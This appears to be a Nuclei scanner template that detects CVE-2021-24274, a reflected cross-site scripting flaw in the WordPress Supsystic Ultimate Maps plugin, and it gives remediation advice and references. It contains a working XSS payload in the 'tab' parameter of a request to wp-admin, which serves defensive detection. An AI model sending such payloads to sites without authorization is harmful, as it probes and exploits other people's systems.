51 lines
1.8 KiB
YAML
51 lines
1.8 KiB
YAML
id: CVE-2021-24274
|
|
|
|
info:
|
|
name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
|
|
author: dhiyaneshDK
|
|
severity: medium
|
|
description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
|
|
remediation: |
|
|
Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
|
|
- http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24274
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-24274
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00147
|
|
epss-percentile: 0.5057
|
|
cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: supsystic
|
|
product: ultimate_maps
|
|
framework: wordpress
|
|
tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100c8d1e510b3aafcdfe7dd3ecbc571f472ce6ec59158b1565b416cde4979a5afef0221009e87e6d21b7eb1154c2c1567c314b9fbbda05722e97d8457fc9648e4685d19f2:922c64590222798bb761d5b6d8e72950
|